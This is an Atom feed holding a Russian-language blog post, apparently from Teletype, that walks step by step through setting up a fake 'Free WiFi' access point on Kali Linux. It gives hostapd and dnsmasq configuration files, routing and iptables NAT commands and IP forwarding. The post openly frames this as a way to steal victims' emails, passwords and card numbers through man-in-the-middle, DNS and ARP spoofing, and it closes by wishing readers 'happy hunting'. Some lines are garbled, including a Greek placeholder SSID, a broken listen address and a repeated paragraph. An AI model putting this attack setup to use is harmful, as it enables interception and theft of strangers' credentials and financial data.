<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>@larkow</title><author><name>@larkow</name></author><id>https://teletype.in/atom/larkow</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/larkow?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@larkow?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=larkow"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/larkow?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-29T01:41:45.358Z</updated><entry><id>larkow:wCqg0URxoLj</id><link rel="alternate" type="text/html" href="https://teletype.in/@larkow/wCqg0URxoLj?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=larkow"></link><title>Как поднять поддельную точку доступа Wi-FI</title><published>2022-05-21T08:23:55.295Z</published><updated>2022-05-21T08:23:55.295Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/44/89/44893b4d-3e07-42f4-b2b9-a1146180a19d.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/81/7d/817d5b0e-86fa-4bbe-bf80-72e798492e62.jpeg&quot;&gt;Расскажу, как поднять поддельную точку доступа Wi-Fi и воровать через нее чужие данные.</summary><content type="html">
  &lt;p id=&quot;Umhm&quot;&gt;Расскажу, как поднять поддельную точку доступа Wi-Fi и воровать через нее чужие данные.&lt;/p&gt;
  &lt;figure id=&quot;wJ7z&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/81/7d/817d5b0e-86fa-4bbe-bf80-72e798492e62.jpeg&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;6CS3&quot;&gt;Всем салют, дорогие друзья!&lt;br /&gt;&lt;strong&gt;После прочтения данной статьи вы наверняка хорошенько подумайте, прежде чем подключиться к бесплатной общественной точке доступа беспроводной сети в кафетерии, аэропорту или отеле.&lt;/strong&gt; Вы когда-нибудь задумывались, безопасен ли публичный Wi-Fi, к которому вы подключаетесь? &lt;strong&gt;Возможно, это поддельная точка доступа, созданная нами, хакерами.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;gmVl&quot;&gt;&lt;strong&gt;После установки поддельной точки доступа и подключения к устройству жертвы хакер запускает атаку “человек посередине” (MITM) для перехвата данных между устройством жертвы и поддельной точкой доступа с целью осуществления дальнейших злонамеренных и вредоносных действий, нужных нам.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;xvNB&quot;&gt;&lt;strong&gt;&lt;u&gt;К сожалению, это не фантастика.&lt;/u&gt;&lt;/strong&gt; Данный сценарий легко осуществим в реальной жизни.&lt;strong&gt; Атака “человек посередине”&lt;/strong&gt; на Wi-Fi сети происходит, когда основной маршрут передачи данных между устройством жертвы и Интернетом проходит через атакующее устройство.&lt;/p&gt;
  &lt;p id=&quot;uGq0&quot;&gt;После успешной атаки “человек посередине” в руки хакера попадет конфиденциальная информация жертв, такая как электронная почта, учетные записи, пароль, номер кредитной карты и другая важная информация, не защищенная протоколами безопасности. &lt;strong&gt;Мы легко можем получить доступ к чувствительным данным с помощью Ethercap, Dsniff Mailsnarf, Urlsnarf, Wireshark, Cain and Able и других инструментов.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;oOFu&quot;&gt;&lt;strong&gt;Хакеры также могут использовать поддельные беспроводные точки доступа для сбора информации о жертвах.&lt;/strong&gt; Для этого они создают в общественном месте точку доступа с примерным названием &amp;quot;Free Public WiFi&amp;quot;, которую ничего не подозревающие пользователи считают реальной. &lt;strong&gt;Жертва подключается к Wi-Fi сети, а хакеры в это время отслеживают/крадут ее данные.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;u7kz&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9c/ab/9cab685a-b29e-45f2-a209-7428de90cc91.jpeg&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;m6mp&quot;&gt;&lt;strong&gt;Сейчас мы покажем вам, как можно осуществить данную атаку, используя всего один ноутбук под управлением Kali Linux.&lt;/strong&gt; Особенностью атаки является то, что хакер и жертва находятся совсем рядом, практически бок о бок, в зоне действия Wi-Fi сигнала.&lt;/p&gt;
  &lt;h2 id=&quot;2GfE&quot;&gt;За дело!&lt;/h2&gt;
  &lt;p id=&quot;2sGd&quot;&gt;&lt;strong&gt;Шаг 1.&lt;/strong&gt; Перед созданием поддельной точки доступа с помощью Kali Linux запустите команду &amp;quot;&lt;strong&gt;sudo apt-get update&lt;/strong&gt;”. Данная команда обновляет список всех пакетов для обновления, как старых пакетов, нуждающихся в обновлении, так и новых, находящихся на хранении.&lt;/p&gt;
  &lt;figure id=&quot;AcIg&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4e/3d/4e3dff5f-5a57-4135-880b-013379b9c961.jpeg&quot; width=&quot;779&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;WOQR&quot;&gt;&lt;strong&gt;Шаг 2 . &lt;/strong&gt;У вас должен быть доступ для установки &lt;strong&gt;hostapd &lt;/strong&gt;и &lt;strong&gt;dnsmasq&lt;/strong&gt;. Dnsmasq - небольшой DNS / DHCP-сервер, который мы будем использовать в этой атаке.&lt;/p&gt;
  &lt;figure id=&quot;Dj1f&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5e/38/5e387e18-70f1-4df9-bd69-a37b5c694d9f.jpeg&quot; width=&quot;780&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;sY1x&quot;&gt;Перед началом установки hostapd следует проверить беспроводное соединение, &lt;br /&gt;используя команду “iwconfig&amp;quot;.&lt;/p&gt;
  &lt;figure id=&quot;GxNq&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/82/ba/82ba854e-1cc1-45b1-8c85-038c61054435.jpeg&quot; width=&quot;780&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vGuM&quot;&gt;​Из приведенных выше выходных данных команды видно, что wlan0 - имя нашего &lt;br /&gt;беспроводного интерфейса.&lt;br /&gt;Шаг 3. Теперь вам нужно перевести этот беспроводной интерфейс в режим &lt;br /&gt;мониторинга, введя следующие команды:&lt;br /&gt;ifconfig wlan0 down&lt;/p&gt;
  &lt;p id=&quot;Wu3Y&quot;&gt;iwconfig wlan0 mode monitor&lt;/p&gt;
  &lt;p id=&quot;qJb4&quot;&gt;ifconfig wlan0 up&lt;/p&gt;
  &lt;figure id=&quot;zI4U&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/49/53/49530752-9d69-4344-a9f9-a3fafa08aa2d.jpeg&quot; width=&quot;780&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;P8Or&quot;&gt;​Шаг 4. Для запуска Hostapd, нам следует создать файл конфигурации для этого &lt;br /&gt;инструмента, который будет содержать всю информацию о SSID, кодовой фразе, &lt;br /&gt;номере канала и т. д.&lt;br /&gt;Просто создайте каталог в /root с помощью команды “mkdir /root/accesspoint”, &lt;br /&gt;чтобы сохранить все необходимые файлы для этой установки.&lt;/p&gt;
  &lt;figure id=&quot;eCFg&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c7/6a/c76a6746-ee00-42f8-acbb-22d5effab8fb.jpeg&quot; width=&quot;779&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Ncw0&quot;&gt;​Шаг 5. Теперь создайте файл конфигурации hostapd (hostapd.conf) в каталоге /&lt;br /&gt;root/accesspoint и запишите в него следующую информацию:&lt;/p&gt;
  &lt;p id=&quot;zGUs&quot; data-align=&quot;center&quot;&gt;​Code:&lt;br /&gt;&lt;strong&gt;interface=wlan0&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;XK8y&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;driver=nl80211&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;4K7D&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;ssid=Το όνομα που θέλετε (π.χ. Free WiFi)&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;0xjB&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;hw_mode=g&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;LN5G&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;channel=11&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;fyZj&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;macaddr_acl=0&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;90Vm&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;ignore_broadcast_ssid=0&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;uGWO&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;auth_algs=1&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;UTZl&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;wpa=2&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;lxTZ&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;wpa_passphrase=iguru123&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dmxD&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;br /&gt;wpa_key_mgmt=WPA-PSK&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;SZRR&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;wpa_pairwise=CCMP&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Mztt&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;wpa_group_rekey=86400&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;1Q09&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;ieee80211n=1&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;0mNF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;wme_enabled=1&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;VI2g&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/71/82/718281d1-c0ad-4d56-828b-ed40c15ea26f.jpeg&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;AuZJ&quot;&gt;Вот, что все это значит:&lt;/p&gt;
  &lt;p id=&quot;hgq8&quot;&gt;interface = Беспроводной интерфейс (соединение) для размещения точки доступа, например. &lt;strong&gt;wlan0&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Y1Ki&quot;&gt;driver = &lt;strong&gt;Nl80211&lt;/strong&gt; - это новый общедоступный сетевой интерфейс 802.11, который теперь заменяется cfg80211&lt;/p&gt;
  &lt;p id=&quot;SB4v&quot;&gt;ssid = Имя беспроводной сети&lt;/p&gt;
  &lt;p id=&quot;z1q6&quot;&gt;hw_mode = Устанавливает, как работают интерфейс и разрешенные каналы. (Обычно используются a, b и g)&lt;/p&gt;
  &lt;p id=&quot;oIEs&quot;&gt;channel = Устанавливает канал для работы hostapd. (От 1 до 13)&lt;/p&gt;
  &lt;p id=&quot;lj90&quot;&gt;macaddr_acl = Используется для фильтрации Mac (0 - выключено, 1 - включено)&lt;/p&gt;
  &lt;p id=&quot;EhwF&quot;&gt;ign_broadcast_ssid = Используется для создания скрытых точек доступа&lt;/p&gt;
  &lt;p id=&quot;eUY4&quot;&gt;auth_algs = Устанавливает алгоритм аутентификации (0 - для открытого, 1 - для общего доступа)&lt;/p&gt;
  &lt;p id=&quot;0Kw8&quot;&gt;wpa_passphrase = Содержит ваш WPA пароль&lt;/p&gt;
  &lt;p id=&quot;kKwn&quot;&gt;&lt;strong&gt;Шаг 6&lt;/strong&gt; . Просто запустите точку доступа с помощью следующей команды:&lt;/p&gt;
  &lt;p id=&quot;lXY3&quot;&gt;&lt;code&gt;hostapd hostapd.conf&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;ORT5&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/6a/1f/6a1fa368-81d6-4ab0-ab1a-a6a8419fc586.jpeg&quot; width=&quot;779&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;jHGl&quot;&gt;Как видите, ваш hostapd успешно работает с wlan0: &lt;strong&gt;AP-ENABLED&lt;/strong&gt; и новым hwaddr, которому случайным образом назначается &lt;strong&gt;“90:f6:52:e3:2e:c2”&lt;/strong&gt;, а также ssid, который вы установили.&lt;/p&gt;
  &lt;p id=&quot;RHbC&quot;&gt;&lt;strong&gt;Шаг 7.&lt;/strong&gt; Теперь вам нужно настроить сетевую маршрутизацию с помощью инструмента &lt;strong&gt;dnsmasq&lt;/strong&gt;, чтобы имелась возможность переключать трафик между сетевыми узлами, а также был путь для отправки данных.&lt;/p&gt;
  &lt;p id=&quot;rJNH&quot;&gt;Создайте файл конфигурации в корневом каталоге с именем &lt;strong&gt;dnsmasq.conf &lt;/strong&gt;и напишите следующие инструкции:&lt;/p&gt;
  &lt;p id=&quot;sd45&quot;&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;psZD&quot;&gt;interface=wlan0&lt;/p&gt;
  &lt;p id=&quot;dcLZ&quot;&gt;dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h&lt;/p&gt;
  &lt;p id=&quot;dWYg&quot;&gt;dhcp-option=3,192.168.1.1&lt;/p&gt;
  &lt;p id=&quot;a0s2&quot;&gt;dhcp-option=6,192.168.1.1&lt;/p&gt;
  &lt;p id=&quot;dgZi&quot;&gt;server=8.8.8.8&lt;/p&gt;
  &lt;p id=&quot;L6y3&quot;&gt;log-queries&lt;/p&gt;
  &lt;p id=&quot;P2mT&quot;&gt;log-dhcp&lt;/p&gt;
  &lt;p id=&quot;eIJa&quot;&gt;listen-address=127.0 .0.1&lt;/p&gt;
  &lt;figure id=&quot;88ZS&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b0/33/b033cb97-3d8b-4cef-aa7b-fcc7e774698b.jpeg&quot; width=&quot;780&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Manf&quot;&gt;&lt;strong&gt;Шаг 8 &lt;/strong&gt;. Назначьте сетевой шлюз и сетевую маску wlan0 интерфейсу и добавьте таблицу маршрутизации, как показано ниже:&lt;/p&gt;
  &lt;p id=&quot;vjob&quot;&gt;ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0&lt;/p&gt;
  &lt;p id=&quot;MBEO&quot;&gt;route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1&lt;/p&gt;
  &lt;p id=&quot;HIDC&quot;&gt;Затем вам нужно запустить службу dnsmasq с файлом конфигурации, который мы создали на предыдущем шаге:&lt;/p&gt;
  &lt;pre id=&quot;kZ56&quot;&gt; dnsmasq -C dnsmasq.conf -d&lt;/pre&gt;
  &lt;p id=&quot;27Gh&quot;&gt;&lt;strong&gt;Dnsmasq &lt;/strong&gt;— легковесный и быстроконфигурируемый DNS-, DHCP- и TFTP-сервер, предназначенный для обеспечения доменными именами и связанными с ними сервисами небольших сетей. Dnsmasq отлично подходит для ограниченных ресурсов маршрутизаторов и межсетевого экрана. Dnsmasq также можно настроить для кэширования DNS-запросов для повышения скорости поиска DNS на сайтах, которые они уже посетили.&lt;/p&gt;
  &lt;figure id=&quot;OJqG&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/61/8a/618a122f-44fb-4fca-9286-a0b81821afce.jpeg&quot; width=&quot;780&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Y000&quot;&gt;&lt;strong&gt;Шаг 9&lt;/strong&gt;. Перед тем, как предоставить доступ в Интернет своим жертвам, убедитесь, что вы настроили iptables, только тогда вы сможете собирать данные и выполнять различные дальнейшие атаки, такие как “ Человек посередине” (MITM), DNS спуфинг, ARP спуфинг и т. д.&lt;/p&gt;
  &lt;p id=&quot;ZDAD&quot;&gt;iptables –table nat –append POSTROUTING -out-interface eth0 -j MASQUERADE&lt;/p&gt;
  &lt;p id=&quot;DYzg&quot;&gt;iptables –append FORWARD –in-interface wlan0 -j ACCEPT&lt;/p&gt;
  &lt;figure id=&quot;n79g&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/de/e4dea301-53d2-4259-b8a2-6fe2795b40b0.jpeg&quot; width=&quot;779&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;EJdM&quot;&gt;&lt;strong&gt;Шаг 10&lt;/strong&gt; . Последний шаг. Включите процесс IP переадресации, набрав “&lt;strong&gt;echo 1&amp;gt; / proc / sys / net / ipv4 / ip_forward&lt;/strong&gt; &amp;quot;.&lt;/p&gt;
  &lt;figure id=&quot;WQRQ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/78/5c/785cddb9-8de8-4aaf-9e82-eee40229be01.jpeg&quot; width=&quot;780&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iNFJ&quot;&gt;Поддельная точка доступа предоставит жертве подключение к Интернету через сетевую Ethernet карту, тем самым гарантируя, что &lt;strong&gt;весь трафик, генерируемый жертвой будет проходить через нас&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;mxP1&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/54/ac/54ac3772-27c8-4f50-acde-3bf9ebddf766.jpeg&quot; width=&quot;779&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iNFJ&quot;&gt;Поддельная точка доступа предоставит жертве подключение к Интернету через сетевую Ethernet карту, тем самым гарантируя, что &lt;strong&gt;весь трафик, генерируемый жертвой будет проходить через нас.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;kqNR&quot;&gt;&lt;strong&gt;На сегодня это все. Желаем хорошей охоты!&lt;/strong&gt;&lt;/p&gt;

</content></entry></feed>